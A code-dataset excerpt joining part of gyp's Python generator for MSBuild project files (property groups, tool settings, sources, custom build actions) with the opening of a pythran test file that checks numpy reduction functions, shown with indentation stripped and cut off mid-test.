['Import',
{'Project': user_props,
'Condition': "exists('%s')" % user_props,
'Label': 'LocalAppDataPlatform'
}
]
]
]
else:
sheets = []
for condition, props in additional_props.iteritems():
import_group = [
'ImportGroup',
{'Label': 'PropertySheets',
'Condition': condition
},
['Import',
{'Project': user_props,
'Condition': "exists('%s')" % user_props,
'Label': 'LocalAppDataPlatform'
}
]
]
for props_file in props:
import_group.append(['Import', {'Project':props_file}])
sheets.append(import_group)
return sheets
def _ConvertMSVSBuildAttributes(spec, config, build_file):
config_type = _GetMSVSConfigurationType(spec, build_file)
msvs_attributes = _GetMSVSAttributes(spec, config, config_type)
msbuild_attributes = {}
for a in msvs_attributes:
if a in ['IntermediateDirectory', 'OutputDirectory']:
directory = MSVSSettings.ConvertVCMacrosToMSBuild(msvs_attributes[a])
if not directory.endswith('\\'):
directory += '\\'
msbuild_attributes[a] = directory
elif a == 'CharacterSet':
msbuild_attributes[a] = _ConvertMSVSCharacterSet(msvs_attributes[a])
elif a == 'ConfigurationType':
msbuild_attributes[a] = _ConvertMSVSConfigurationType(msvs_attributes[a])
else:
print 'Warning: Do not know how to convert MSVS attribute ' + a
return msbuild_attributes
def _ConvertMSVSCharacterSet(char_set):
if char_set.isdigit():
char_set = {
'0': 'MultiByte',
'1': 'Unicode',
'2': 'MultiByte',
}[char_set]
return char_set
def _ConvertMSVSConfigurationType(config_type):
if config_type.isdigit():
config_type = {
'1': 'Application',
'2': 'DynamicLibrary',
'4': 'StaticLibrary',
'10': 'Utility'
}[config_type]
return config_type
def _GetMSBuildAttributes(spec, config, build_file):
if 'msbuild_configuration_attributes' not in config:
msbuild_attributes = _ConvertMSVSBuildAttributes(spec, config, build_file)
else:
config_type = _GetMSVSConfigurationType(spec, build_file)
config_type = _ConvertMSVSConfigurationType(config_type)
msbuild_attributes = config.get('msbuild_configuration_attributes', {})
msbuild_attributes.setdefault('ConfigurationType', config_type)
output_dir = msbuild_attributes.get('OutputDirectory',
'$(SolutionDir)$(Configuration)')
msbuild_attributes['OutputDirectory'] = _FixPath(output_dir) + '\\'
if 'IntermediateDirectory' not in msbuild_attributes:
intermediate = _FixPath('$(Configuration)') + '\\'
msbuild_attributes['IntermediateDirectory'] = intermediate
if 'CharacterSet' in msbuild_attributes:
msbuild_attributes['CharacterSet'] = _ConvertMSVSCharacterSet(
msbuild_attributes['CharacterSet'])
if 'TargetName' not in msbuild_attributes:
prefix = spec.get('product_prefix', '')
product_name = spec.get('product_name', '$(ProjectName)')
target_name = prefix + product_name
msbuild_attributes['TargetName'] = target_name
if spec.get('msvs_external_builder'):
external_out_dir = spec.get('msvs_external_builder_out_dir', '.')
msbuild_attributes['OutputDirectory'] = _FixPath(external_out_dir) + '\\'
# Make sure that 'TargetPath' matches 'Lib.OutputFile' or 'Link.OutputFile'
# (depending on the tool used) to avoid MSB8012 warning.
msbuild_tool_map = {
'executable': 'Link',
'shared_library': 'Link',
'loadable_module': 'Link',
'static_library': 'Lib',
}
msbuild_tool = msbuild_tool_map.get(spec['type'])
if msbuild_tool:
msbuild_settings = config['finalized_msbuild_settings']
out_file = msbuild_settings[msbuild_tool].get('OutputFile')
if out_file:
msbuild_attributes['TargetPath'] = _FixPath(out_file)
target_ext = msbuild_settings[msbuild_tool].get('TargetExt')
if target_ext:
msbuild_attributes['TargetExt'] = target_ext
return msbuild_attributes
def _GetMSBuildConfigurationGlobalProperties(spec, configurations, build_file):
# TODO(jeanluc) We could optimize out the following and do it only if
# there are actions.
# TODO(jeanluc) Handle the equivalent of setting 'CYGWIN=nontsec'.
new_paths = []
cygwin_dirs = spec.get('msvs_cygwin_dirs', ['.'])[0]
if cygwin_dirs:
cyg_path = '$(MSBuildProjectDirectory)\\%s\\bin\\' % _FixPath(cygwin_dirs)
new_paths.append(cyg_path)
# TODO(jeanluc) Change the convention to have both a cygwin_dir and a
# python_dir.
python_path = cyg_path.replace('cygwin\\bin', 'python_26')
new_paths.append(python_path)
if new_paths:
new_paths = '$(ExecutablePath);' + ';'.join(new_paths)
properties = {}
for (name, configuration) in sorted(configurations.iteritems()):
condition = _GetConfigurationCondition(name, configuration)
attributes = _GetMSBuildAttributes(spec, configuration, build_file)
msbuild_settings = configuration['finalized_msbuild_settings']
_AddConditionalProperty(properties, condition, 'IntDir',
attributes['IntermediateDirectory'])
_AddConditionalProperty(properties, condition, 'OutDir',
attributes['OutputDirectory'])
_AddConditionalProperty(properties, condition, 'TargetName',
attributes['TargetName'])
if attributes.get('TargetPath'):
_AddConditionalProperty(properties, condition, 'TargetPath',
attributes['TargetPath'])
if attributes.get('TargetExt'):
_AddConditionalProperty(properties, condition, 'TargetExt',
attributes['TargetExt'])
if new_paths:
_AddConditionalProperty(properties, condition, 'ExecutablePath',
new_paths)
tool_settings = msbuild_settings.get('', {})
for name, value in sorted(tool_settings.iteritems()):
formatted_value = _GetValueFormattedForMSBuild('', name, value)
_AddConditionalProperty(properties, condition, name, formatted_value)
return _GetMSBuildPropertyGroup(spec, None, properties)
def _AddConditionalProperty(properties, condition, name, value):
"""Adds a property / conditional value pair to a dictionary.
Arguments:
properties: The dictionary to be modified. The key is the name of the
property. The value is itself a dictionary; its key is the value and
the value a list of condition for which this value is true.
condition: The condition under which the named property has the value.
name: The name of the property.
value: The value of the property.
"""
if name not in properties:
properties[name] = {}
values = properties[name]
if value not in values:
values[value] = []
conditions = values[value]
conditions.append(condition)
# Regex for msvs variable references ( i.e. $(FOO) ).
MSVS_VARIABLE_REFERENCE = re.compile('\$\(([a-zA-Z_][a-zA-Z0-9_]*)\)')
def _GetMSBuildPropertyGroup(spec, label, properties):
"""Returns a PropertyGroup definition for the specified properties.
Arguments:
spec: The target project dict.
label: An optional label for the PropertyGroup.
properties: The dictionary to be converted. The key is the name of the
property. The value is itself a dictionary; its key is the value and
the value a list of condition for which this value is true.
"""
group = ['PropertyGroup']
if label:
group.append({'Label': label})
num_configurations = len(spec['configurations'])
def GetEdges(node):
# Use a definition of edges such that user_of_variable -> used_varible.
# This happens to be easier in this case, since a variable's
# definition contains all variables it references in a single string.
edges = set()
for value in sorted(properties[node].keys()):
# Add to edges all $(...) references to variables.
#
# Variable references that refer to names not in properties are excluded
# These can exist for instance to refer built in definitions like
# $(SolutionDir).
#
# Self references are ignored. Self reference is used in a few places to
# append to the default value. I.e. PATH=$(PATH);other_path
edges.update(set([v for v in MSVS_VARIABLE_REFERENCE.findall(value)
if v in properties and v != node]))
return edges
properties_ordered = gyp.common.TopologicallySorted(
properties.keys(), GetEdges)
# Walk properties in the reverse of a topological sort on
# user_of_variable -> used_variable as this ensures variables are
# defined before they are used.
# NOTE: reverse(topsort(DAG)) = topsort(reverse_edges(DAG))
for name in reversed(properties_ordered):
values = properties[name]
for value, conditions in sorted(values.iteritems()):
if len(conditions) == num_configurations:
# If the value is the same all configurations,
# just add one unconditional entry.
group.append([name, value])
else:
for condition in conditions:
group.append([name, {'Condition': condition}, value])
return [group]
def _GetMSBuildToolSettingsSections(spec, configurations):
groups = []
for (name, configuration) in sorted(configurations.iteritems()):
msbuild_settings = configuration['finalized_msbuild_settings']
group = ['ItemDefinitionGroup',
{'Condition': _GetConfigurationCondition(name, configuration)}
]
for tool_name, tool_settings in sorted(msbuild_settings.iteritems()):
# Skip the tool named '' which is a holder of global settings handled
# by _GetMSBuildConfigurationGlobalProperties.
if tool_name:
if tool_settings:
tool = [tool_name]
for name, value in sorted(tool_settings.iteritems()):
formatted_value = _GetValueFormattedForMSBuild(tool_name, name,
value)
tool.append([name, formatted_value])
group.append(tool)
groups.append(group)
return groups
def _FinalizeMSBuildSettings(spec, configuration):
if 'msbuild_settings' in configuration:
converted = False
msbuild_settings = configuration['msbuild_settings']
MSVSSettings.ValidateMSBuildSettings(msbuild_settings)
else:
converted = True
msvs_settings = configuration.get('msvs_settings', {})
msbuild_settings = MSVSSettings.ConvertToMSBuildSettings(msvs_settings)
include_dirs, resource_include_dirs = _GetIncludeDirs(configuration)
libraries = _GetLibraries(spec)
library_dirs = _GetLibraryDirs(configuration)
out_file, _, msbuild_tool = _GetOutputFilePathAndTool(spec, msbuild=True)
target_ext = _GetOutputTargetExt(spec)
defines = _GetDefines(configuration)
if converted:
# Visual Studio 2010 has TR1
defines = [d for d in defines if d != '_HAS_TR1=0']
# Warn of ignored settings
ignored_settings = ['msvs_prebuild', 'msvs_postbuild', 'msvs_tool_files']
for ignored_setting in ignored_settings:
value = configuration.get(ignored_setting)
if value:
print ('Warning: The automatic conversion to MSBuild does not handle '
'%s. Ignoring setting of %s' % (ignored_setting, str(value)))
defines = [_EscapeCppDefineForMSBuild(d) for d in defines]
disabled_warnings = _GetDisabledWarnings(configuration)
# TODO(jeanluc) Validate & warn that we don't translate
# prebuild = configuration.get('msvs_prebuild')
# postbuild = configuration.get('msvs_postbuild')
def_file = _GetModuleDefinition(spec)
precompiled_header = configuration.get('msvs_precompiled_header')
# Add the information to the appropriate tool
# TODO(jeanluc) We could optimize and generate these settings only if
# the corresponding files are found, e.g. don't generate ResourceCompile
# if you don't have any resources.
_ToolAppend(msbuild_settings, 'ClCompile',
'AdditionalIncludeDirectories', include_dirs)
_ToolAppend(msbuild_settings, 'ResourceCompile',
'AdditionalIncludeDirectories', resource_include_dirs)
# Add in libraries, note that even for empty libraries, we want this
# set, to prevent inheriting default libraries from the enviroment.
_ToolSetOrAppend(msbuild_settings, 'Link', 'AdditionalDependencies',
libraries)
_ToolAppend(msbuild_settings, 'Link', 'AdditionalLibraryDirectories',
library_dirs)
if out_file:
_ToolAppend(msbuild_settings, msbuild_tool, 'OutputFile', out_file,
only_if_unset=True)
if target_ext:
_ToolAppend(msbuild_settings, msbuild_tool, 'TargetExt', target_ext,
only_if_unset=True)
# Add defines.
_ToolAppend(msbuild_settings, 'ClCompile',
'PreprocessorDefinitions', defines)
_ToolAppend(msbuild_settings, 'ResourceCompile',
'PreprocessorDefinitions', defines)
# Add disabled warnings.
_ToolAppend(msbuild_settings, 'ClCompile',
'DisableSpecificWarnings', disabled_warnings)
# Turn on precompiled headers if appropriate.
if precompiled_header:
precompiled_header = os.path.split(precompiled_header)[1]
_ToolAppend(msbuild_settings, 'ClCompile', 'PrecompiledHeader', 'Use')
_ToolAppend(msbuild_settings, 'ClCompile',
'PrecompiledHeaderFile', precompiled_header)
_ToolAppend(msbuild_settings, 'ClCompile',
'ForcedIncludeFiles', [precompiled_header])
# Loadable modules don't generate import libraries;
# tell dependent projects to not expect one.
if spec['type'] == 'loadable_module':
_ToolAppend(msbuild_settings, '', 'IgnoreImportLibrary', 'true')
# Set the module definition file if any.
if def_file:
_ToolAppend(msbuild_settings, 'Link', 'ModuleDefinitionFile', def_file)
configuration['finalized_msbuild_settings'] = msbuild_settings
def _GetValueFormattedForMSBuild(tool_name, name, value):
if type(value) == list:
# For some settings, VS2010 does not automatically extends the settings
# TODO(jeanluc) Is this what we want?
if name in ['AdditionalIncludeDirectories',
'AdditionalLibraryDirectories',
'AdditionalOptions',
'DelayLoadDLLs',
'DisableSpecificWarnings',
'PreprocessorDefinitions']:
value.append('%%(%s)' % name)
# For most tools, entries in a list should be separated with ';' but some
# settings use a space. Check for those first.
exceptions = {
'ClCompile': ['AdditionalOptions'],
'Link': ['AdditionalOptions'],
'Lib': ['AdditionalOptions']}
if tool_name in exceptions and name in exceptions[tool_name]:
char = ' '
else:
char = ';'
formatted_value = char.join(
[MSVSSettings.ConvertVCMacrosToMSBuild(i) for i in value])
else:
formatted_value = MSVSSettings.ConvertVCMacrosToMSBuild(value)
return formatted_value
def _VerifySourcesExist(sources, root_dir):
"""Verifies that all source files exist on disk.
Checks that all regular source files, i.e. not created at run time,
exist on disk. Missing files cause needless recompilation but no otherwise
visible errors.
Arguments:
sources: A recursive list of Filter/file names.
root_dir: The root directory for the relative path names.
Returns:
A list of source files that cannot be found on disk.
"""
missing_sources = []
for source in sources:
if isinstance(source, MSVSProject.Filter):
missing_sources.extend(_VerifySourcesExist(source.contents, root_dir))
else:
if '$' not in source:
full_path = os.path.join(root_dir, source)
if not os.path.exists(full_path):
missing_sources.append(full_path)
return missing_sources
def _GetMSBuildSources(spec, sources, exclusions, extension_to_rule_name,
actions_spec, sources_handled_by_action, list_excluded):
groups = ['none', 'midl', 'include', 'compile', 'resource', 'rule']
grouped_sources = {}
for g in groups:
grouped_sources[g] = []
_AddSources2(spec, sources, exclusions, grouped_sources,
extension_to_rule_name, sources_handled_by_action, list_excluded)
sources = []
for g in groups:
if grouped_sources[g]:
sources.append(['ItemGroup'] + grouped_sources[g])
if actions_spec:
sources.append(['ItemGroup'] + actions_spec)
return sources
def _AddSources2(spec, sources, exclusions, grouped_sources,
extension_to_rule_name, sources_handled_by_action,
list_excluded):
extensions_excluded_from_precompile = []
for source in sources:
if isinstance(source, MSVSProject.Filter):
_AddSources2(spec, source.contents, exclusions, grouped_sources,
extension_to_rule_name, sources_handled_by_action,
list_excluded)
else:
if not source in sources_handled_by_action:
detail = []
excluded_configurations = exclusions.get(source, [])
if len(excluded_configurations) == len(spec['configurations']):
detail.append(['ExcludedFromBuild', 'true'])
else:
for config_name, configuration in sorted(excluded_configurations):
condition = _GetConfigurationCondition(config_name, configuration)
detail.append(['ExcludedFromBuild',
{'Condition': condition},
'true'])
# Add precompile if needed
for config_name, configuration in spec['configurations'].iteritems():
precompiled_source = configuration.get('msvs_precompiled_source', '')
if precompiled_source != '':
precompiled_source = _FixPath(precompiled_source)
if not extensions_excluded_from_precompile:
# If the precompiled header is generated by a C source, we must
# not try to use it for C++ sources, and vice versa.
basename, extension = os.path.splitext(precompiled_source)
if extension == '.c':
extensions_excluded_from_precompile = ['.cc', '.cpp', '.cxx']
else:
extensions_excluded_from_precompile = ['.c']
if precompiled_source == source:
condition = _GetConfigurationCondition(config_name, configuration)
detail.append(['PrecompiledHeader',
{'Condition': condition},
'Create'
])
else:
# Turn off precompiled header usage for source files of a
# different type than the file that generated the
# precompiled header.
for extension in extensions_excluded_from_precompile:
if source.endswith(extension):
detail.append(['PrecompiledHeader', ''])
detail.append(['ForcedIncludeFiles', ''])
group, element = _MapFileToMsBuildSourceType(source,
extension_to_rule_name)
grouped_sources[group].append([element, {'Include': source}] + detail)
def _GetMSBuildProjectReferences(project):
references = []
if project.dependencies:
group = ['ItemGroup']
for dependency in project.dependencies:
guid = dependency.guid
project_dir = os.path.split(project.path)[0]
relative_path = gyp.common.RelativePath(dependency.path, project_dir)
project_ref = ['ProjectReference',
{'Include': relative_path},
['Project', guid],
['ReferenceOutputAssembly', 'false']
]
for config in dependency.spec.get('configurations', {}).itervalues():
# If it's disabled in any config, turn it off in the reference.
if config.get('msvs_2010_disable_uldi_when_referenced', 0):
project_ref.append(['UseLibraryDependencyInputs', 'false'])
break
group.append(project_ref)
references.append(group)
return references
def _GenerateMSBuildProject(project, options, version, generator_flags):
spec = project.spec
configurations = spec['configurations']
project_dir, project_file_name = os.path.split(project.path)
gyp.common.EnsureDirExists(project.path)
# Prepare list of sources and excluded sources.
gyp_path = _NormalizedSource(project.build_file)
relative_path_of_gyp_file = gyp.common.RelativePath(gyp_path, project_dir)
gyp_file = os.path.split(project.build_file)[1]
sources, excluded_sources = _PrepareListOfSources(spec, generator_flags,
gyp_file)
# Add rules.
actions_to_add = {}
props_files_of_rules = set()
targets_files_of_rules = set()
extension_to_rule_name = {}
list_excluded = generator_flags.get('msvs_list_excluded_files', True)
# Don't generate rules if we are using an external builder like ninja.
if not spec.get('msvs_external_builder'):
_GenerateRulesForMSBuild(project_dir, options, spec,
sources, excluded_sources,
props_files_of_rules, targets_files_of_rules,
actions_to_add, extension_to_rule_name)
else:
rules = spec.get('rules', [])
_AdjustSourcesForRules(spec, rules, sources, excluded_sources)
sources, excluded_sources, excluded_idl = (
_AdjustSourcesAndConvertToFilterHierarchy(spec, options,
project_dir, sources,
excluded_sources,
list_excluded))
# Don't add actions if we are using an external builder like ninja.
if not spec.get('msvs_external_builder'):
_AddActions(actions_to_add, spec, project.build_file)
_AddCopies(actions_to_add, spec)
# NOTE: this stanza must appear after all actions have been decided.
# Don't excluded sources with actions attached, or they won't run.
excluded_sources = _FilterActionsFromExcluded(
excluded_sources, actions_to_add)
exclusions = _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl)
actions_spec, sources_handled_by_action = _GenerateActionsForMSBuild(
spec, actions_to_add)
_GenerateMSBuildFiltersFile(project.path + '.filters', sources,
extension_to_rule_name)
missing_sources = _VerifySourcesExist(sources, project_dir)
for configuration in configurations.itervalues():
_FinalizeMSBuildSettings(spec, configuration)
# Add attributes to root element
import_default_section = [
['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.Default.props'}]]
import_cpp_props_section = [
['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.props'}]]
import_cpp_targets_section = [
['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.targets'}]]
macro_section = [['PropertyGroup', {'Label': 'UserMacros'}]]
content = [
'Project',
{'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003',
'ToolsVersion': version.ProjectVersion(),
'DefaultTargets': 'Build'
}]
content += _GetMSBuildProjectConfigurations(configurations)
content += _GetMSBuildGlobalProperties(spec, project.guid, project_file_name)
content += import_default_section
content += _GetMSBuildConfigurationDetails(spec, project.build_file)
content += _GetMSBuildLocalProperties(project.msbuild_toolset)
content += import_cpp_props_section
content += _GetMSBuildExtensions(props_files_of_rules)
content += _GetMSBuildPropertySheets(configurations)
content += macro_section
content += _GetMSBuildConfigurationGlobalProperties(spec, configurations,
project.build_file)
content += _GetMSBuildToolSettingsSections(spec, configurations)
content += _GetMSBuildSources(
spec, sources, exclusions, extension_to_rule_name, actions_spec,
sources_handled_by_action, list_excluded)
content += _GetMSBuildProjectReferences(project)
content += import_cpp_targets_section
content += _GetMSBuildExtensionTargets(targets_files_of_rules)
if spec.get('msvs_external_builder'):
content += _GetMSBuildExternalBuilderTargets(spec)
# TODO(jeanluc) File a bug to get rid of runas. We had in MSVS:
# has_run_as = _WriteMSVSUserFile(project.path, version, spec)
easy_xml.WriteXmlIfChanged(content, project.path, pretty=True, win32=True)
return missing_sources
def _GetMSBuildExternalBuilderTargets(spec):
"""Return a list of MSBuild targets for external builders.
Right now, only "Build" and "Clean" targets are generated.
Arguments:
spec: The gyp target spec.
Returns:
List of MSBuild 'Target' specs.
"""
build_cmd = _BuildCommandLineForRuleRaw(
spec, spec['msvs_external_builder_build_cmd'],
False, False, False, False)
build_target = ['Target', {'Name': 'Build'}]
build_target.append(['Exec', {'Command': build_cmd}])
clean_cmd = _BuildCommandLineForRuleRaw(
spec, spec['msvs_external_builder_clean_cmd'],
False, False, False, False)
clean_target = ['Target', {'Name': 'Clean'}]
clean_target.append(['Exec', {'Command': clean_cmd}])
return [build_target, clean_target]
def _GetMSBuildExtensions(props_files_of_rules):
extensions = ['ImportGroup', {'Label': 'ExtensionSettings'}]
for props_file in props_files_of_rules:
extensions.append(['Import', {'Project': props_file}])
return [extensions]
def _GetMSBuildExtensionTargets(targets_files_of_rules):
targets_node = ['ImportGroup', {'Label': 'ExtensionTargets'}]
for targets_file in sorted(targets_files_of_rules):
targets_node.append(['Import', {'Project': targets_file}])
return [targets_node]
def _GenerateActionsForMSBuild(spec, actions_to_add):
"""Add actions accumulated into an actions_to_add, merging as needed.
Arguments:
spec: the target project dict
actions_to_add: dictionary keyed on input name, which maps to a list of
dicts describing the actions attached to that input file.
Returns:
A pair of (action specification, the sources handled by this action).
"""
sources_handled_by_action = OrderedSet()
actions_spec = []
for primary_input, actions in actions_to_add.iteritems():
inputs = OrderedSet()
outputs = OrderedSet()
descriptions = []
commands = []
for action in actions:
inputs.update(OrderedSet(action['inputs']))
outputs.update(OrderedSet(action['outputs']))
descriptions.append(action['description'])
cmd = action['command']
# For most actions, add 'call' so that actions that invoke batch files
# return and continue executing. msbuild_use_call provides a way to
# disable this but I have not seen any adverse effect from doing that
# for everything.
if action.get('msbuild_use_call', True):
cmd = 'call ' + cmd
commands.append(cmd)
# Add the custom build action for one input file.
description = ', and also '.join(descriptions)
# We can't join the commands simply with && because the command line will
# get too long. See also _AddActions: cygwin's setup_env mustn't be called
# for every invocation or the command that sets the PATH will grow too
# long.
command = (
'\r\nif %errorlevel% neq 0 exit /b %errorlevel%\r\n'.join(commands))
_AddMSBuildAction(spec,
primary_input,
inputs,
outputs,
command,
description,
sources_handled_by_action,
actions_spec)
return actions_spec, sources_handled_by_action
def _AddMSBuildAction(spec, primary_input, inputs, outputs, cmd, description,
sources_handled_by_action, actions_spec):
command = MSVSSettings.ConvertVCMacrosToMSBuild(cmd)
primary_input = _FixPath(primary_input)
inputs_array = _FixPaths(inputs)
outputs_array = _FixPaths(outputs)
additional_inputs = ';'.join([i for i in inputs_array
if i != primary_input])
outputs = ';'.join(outputs_array)
sources_handled_by_action.add(primary_input)
action_spec = ['CustomBuild', {'Include': primary_input}]
action_spec.extend(
# TODO(jeanluc) 'Document' for all or just if as_sources?
[['FileType', 'Document'],
['Command', command],
['Message', description],
['Outputs', outputs]
])
if additional_inputs:
action_spec.append(['AdditionalInputs', additional_inputs])
actions_spec.append(action_spec)
| bsd-3-clause |
pombredanne/pythran | pythran/tests/test_numpy_func1.py | 3 | 14718 | import unittest
from test_env import TestEnv
import numpy
@TestEnv.module
class TestNumpyFunc1(TestEnv):
def test_sum_bool2(self):
self.run_test("def np_sum_bool2(a): return a.sum()", numpy.ones(10,dtype=bool).reshape(2,5), np_sum_bool2=[numpy.array([[bool]])])
def test_sum_expr(self):
self.run_test("def np_sum_expr(a):\n from numpy import ones\n return (a + ones(10)).sum()", numpy.arange(10), np_sum_expr=[numpy.array([int])])
def test_sum2_(self):
self.run_test("def np_sum2_(a): return a.sum()", numpy.arange(10).reshape(2,5), np_sum2_=[numpy.array([[int]])])
def test_sum3_(self):
self.run_test("def np_sum3_(a): return a.sum(1)", numpy.arange(10).reshape(2,5), np_sum3_=[numpy.array([[int]])])
def test_sum4_(self):
self.run_test("def np_sum4_(a): return a.sum(0)", numpy.arange(10).reshape(2,5), np_sum4_=[numpy.array([[int]])])
def test_sum5_(self):
self.run_test("def np_sum5_(a): return a.sum(0)", numpy.arange(10), np_sum5_=[numpy.array([int])])
def test_sum6_(self):
self.run_test("def np_sum6_(a): return a.sum(0)", numpy.arange(12).reshape(2,3,2), np_sum6_=[numpy.array([[[int]]])])
def test_sum7_(self):
self.run_test("def np_sum7_(a): return a.sum(1)", numpy.arange(12).reshape(2,3,2), np_sum7_=[numpy.array([[[int]]])])
def test_sum8_(self):
self.run_test("def np_sum8_(a): return a.sum(2)", numpy.arange(12).reshape(2,3,2), np_sum8_=[numpy.array([[[int]]])])
def test_sum9_(self):
self.run_test("def np_sum9_(a): import numpy as np ; return np.sum(a*a,0)", numpy.arange(12).reshape(2,3,2), np_sum9_=[numpy.array([[[int]]])])
def test_sum10_(self):
self.run_test("def np_sum10_(a): import numpy as np ; return np.sum(a-a,1)", numpy.arange(12).reshape(2,3,2), np_sum10_=[numpy.array([[[int]]])])
def test_sum11_(self):
self.run_test("def np_sum11_(a): import numpy as np ; return np.sum(a+a,2)", numpy.arange(12).reshape(2,3,2), np_sum11_=[numpy.array([[[int]]])])
def test_prod_(self):
""" Check prod function for numpy array. """
self.run_test("""
def np_prod_(a):
return a.prod()""",
numpy.arange(10),
np_prod_=[numpy.array([int])])
def test_prod_bool(self):
self.run_test("def np_prod_bool(a): return (a > 2).prod()", numpy.arange(10), np_prod_bool=[numpy.array([int])])
def test_prod_bool2(self):
self.run_test("def np_prod_bool2(a): return a.prod()", numpy.ones(10,dtype=bool).reshape(2,5), np_prod_bool2=[numpy.array([[bool]])])
def test_prod2_(self):
self.run_test("def np_prod2_(a): return a.prod()", numpy.arange(10).reshape(2,5), np_prod2_=[numpy.array([[int]])])
def test_prod3_(self):
self.run_test("def np_prod3_(a): return a.prod(1)", numpy.arange(10).reshape(2,5), np_prod3_=[numpy.array([[int]])])
def test_prod4_(self):
self.run_test("def np_prod4_(a): return a.prod(0)", numpy.arange(10).reshape(2,5), np_prod4_=[numpy.array([[int]])])
def test_prod5_(self):
self.run_test("def np_prod5_(a): return a.prod(0)", numpy.arange(10), np_prod5_=[numpy.array([int])])
def test_prod6_(self):
self.run_test("def np_prod6_(a): return a.prod(0)", numpy.arange(12).reshape(2,3,2), np_prod6_=[numpy.array([[[int]]])])
def test_prod7_(self):
self.run_test("def np_prod7_(a): return a.prod(1)", numpy.arange(12).reshape(2,3,2), np_prod7_=[numpy.array([[[int]]])])
def test_prod8_(self):
self.run_test("def np_prod8_(a): return a.prod(2)", numpy.arange(12).reshape(2,3,2), np_prod8_=[numpy.array([[[int]]])])
def test_prod9_(self):
self.run_test("def np_prod9_(a): import numpy as np ; return np.prod(a*a,0)", numpy.arange(12).reshape(2,3,2), np_prod9_=[numpy.array([[[int]]])])
def test_prod10_(self):
self.run_test("def np_prod10_(a): import numpy as np ; return np.prod(a-a,1)", numpy.arange(12).reshape(2,3,2), np_prod10_=[numpy.array([[[int]]])])
def test_prod11_(self):
self.run_test("def np_prod11_(a): import numpy as np ; return np.prod(a+a,2)", numpy.arange(12).reshape(2,3,2), np_prod11_=[numpy.array([[[int]]])])
def test_prod_expr(self):
self.run_test("def np_prod_expr(a):\n from numpy import ones\n return (a + ones(10)).prod()", numpy.arange(10), np_prod_expr=[numpy.array([int])])
def test_amin_amax(self):
self.run_test("def np_amin_amax(a):\n from numpy import amin,amax\n return amin(a), amax(a)",numpy.arange(10), np_amin_amax=[numpy.array([int])])
def test_min_(self):
self.run_test("def np_min_(a): return a.min()", numpy.arange(10), np_min_=[numpy.array([int])])
def test_min1_(self):
self.run_test("def np_min1_(a): return (a+a).min()", numpy.arange(10), np_min1_=[numpy.array([int])])
def test_min2_(self):
self.run_test("def np_min2_(a): return a.min()", numpy.arange(10).reshape(2,5), np_min2_=[numpy.array([[int]])])
def test_min3_(self):
self.run_test("def np_min3_(a): return a.min(1)", numpy.arange(10).reshape(2,5), np_min3_=[numpy.array([[int]])])
def test_min4_(self):
self.run_test("def np_min4_(a): return a.min(0)", numpy.arange(10).reshape(2,5), np_min4_=[numpy.array([[int]])])
def test_min5_(self):
self.run_test("def np_min5_(a): return a.min(0)", numpy.arange(10), np_min5_=[numpy.array([int])])
def test_min6_(self):
self.run_test("def np_min6_(a): return a.min(1)", numpy.arange(30).reshape(2,5,3), np_min6_=[numpy.array([[[int]]])])
def test_min7_(self):
self.run_test("def np_min7_(a): return (a+a).min(1)", numpy.arange(30).reshape(2,5,3), np_min7_=[numpy.array([[[int]]])])
def test_max_(self):
self.run_test("def np_max_(a): return a.max()", numpy.arange(10), np_max_=[numpy.array([int])])
def test_max1_(self):
self.run_test("def np_max1_(a): return (a+a).max()", numpy.arange(10), np_max1_=[numpy.array([int])])
def test_max2_(self):
self.run_test("def np_max2_(a): return a.max()", numpy.arange(10).reshape(2,5), np_max2_=[numpy.array([[int]])])
def test_max3_(self):
self.run_test("def np_max3_(a): return a.max(1)", numpy.arange(10).reshape(2,5), np_max3_=[numpy.array([[int]])])
def test_max4_(self):
self.run_test("def np_max4_(a): return a.max(0)", numpy.arange(10).reshape(2,5), np_max4_=[numpy.array([[int]])])
def test_max5_(self):
self.run_test("def np_max5_(a): return a.max(0)", numpy.arange(10), np_max5_=[numpy.array([int])])
def test_max6_(self):
self.run_test("def np_max6_(a): return a.max(1)", numpy.arange(30).reshape(2,5,3), np_max6_=[numpy.array([[[int]]])])
def test_max7_(self):
self.run_test("def np_max7_(a): return (a+a).max(1)", numpy.arange(30).reshape(2,5,3), np_max7_=[numpy.array([[[int]]])])
def test_all_(self):
self.run_test("def np_all_(a): return a.all()", numpy.arange(10), np_all_=[numpy.array([int])])
def test_all2_(self):
self.run_test("def np_all2_(a): return a.all()", numpy.ones(10).reshape(2,5), np_all2_=[numpy.array([[float]])])
def test_all3_(self):
self.run_test("def np_all3_(a): return a.all(1)", numpy.arange(10).reshape(2,5), np_all3_=[numpy.array([[int]])])
def test_all4_(self):
self.run_test("def np_all4_(a): return a.all(0)", numpy.ones(10).reshape(2,5), np_all4_=[numpy.array([[float]])])
def test_all5_(self):
self.run_test("def np_all5_(a): return a.all(0)", numpy.arange(10), np_all5_=[numpy.array([int])])
def test_all6_(self):
self.run_test("def np_all6_(a): return a.all().all()", numpy.arange(10), np_all6_=[numpy.array([int])])
def test_all7_(self):
self.run_test("def np_all7_(a): return a.all().all(0)", numpy.arange(10), np_all7_=[numpy.array([int])])
def test_transpose_(self):
self.run_test("def np_transpose_(a): return a.transpose()", numpy.arange(24).reshape(2,3,4), np_transpose_=[numpy.array([[[int]]])])
def test_transpose_expr(self):
self.run_test("def np_transpose_expr(a): return (a + a).transpose()", numpy.ones(24).reshape(2,3,4), np_transpose_expr=[numpy.array([[[float]]])])
def test_transpose2_(self):
self.run_test("def np_transpose2_(a): return a.transpose((2,0,1))", numpy.arange(24).reshape(2,3,4), np_transpose2_=[numpy.array([[[int]]])])
def test_alen0(self):
self.run_test("def np_alen0(a): from numpy import alen ; return alen(a)", numpy.ones((5,6)), np_alen0=[numpy.array([[float]])])
def test_alen1(self):
self.run_test("def np_alen1(a): from numpy import alen ; return alen(-a)", numpy.ones((5,6)), np_alen1=[numpy.array([[float]])])
def test_allclose0(self):
self.run_test("def np_allclose0(a): from numpy import allclose ; return allclose([1e10,1e-7], a)", [1.00001e10,1e-8], np_allclose0=[[float]])
def test_allclose1(self):
self.run_test("def np_allclose1(a): from numpy import allclose; return allclose([1e10,1e-8], +a)", numpy.array([1.00001e10,1e-9]), np_allclose1=[numpy.array([float])])
def test_allclose2(self):
